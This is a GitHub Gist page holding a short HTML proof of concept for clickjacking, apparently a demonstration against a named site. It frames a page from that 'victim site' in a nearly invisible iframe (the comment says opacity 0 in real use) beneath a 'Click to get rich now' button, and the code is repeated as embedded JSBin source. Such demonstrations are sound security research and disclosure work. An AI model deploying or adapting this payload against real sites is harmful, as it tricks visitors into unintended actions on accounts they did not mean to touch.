Created
October 4, 2018 17:04
-
-
Save onyxblade/c60a72a637e21a99c6991e8b85c3362c to your computer and use it in GitHub Desktop.
// source https://jsbin.com
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<style> | |
.parent { | |
margin-top: -690px; | |
margin-left: -360px; | |
position: absolute; | |
opacity: 0.2; /* in real opacity:0 */ | |
z-index: 1; | |
} | |
</style> | |
<div>Click to get rich now:</div> | |
<br> | |
<!-- The url from the victim site --> | |
<div class="parent"> | |
<iframe src="https://pub.bitrabbit.com/groups/water/topics/91109" height="1000px" width="1000px"></iframe> | |
</div> | |
<button>Click here!</button> | |
<script id="jsbin-source-html" type="text/html"><style> | |
.parent { | |
margin-top: -690px; | |
margin-left: -360px; | |
position: absolute; | |
opacity: 0.2; /* in real opacity:0 */ | |
z-index: 1; | |
} | |
</style> | |
<div>Click to get rich now:</div> | |
<br> | |
<\!-- The url from the victim site --> | |
<div class="parent"> | |
<iframe src="https://pub.bitrabbit.com/groups/water/topics/91109" height="1000px" width="1000px"></iframe> | |
</div> | |
<button>Click here!</button> | |
</script> | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment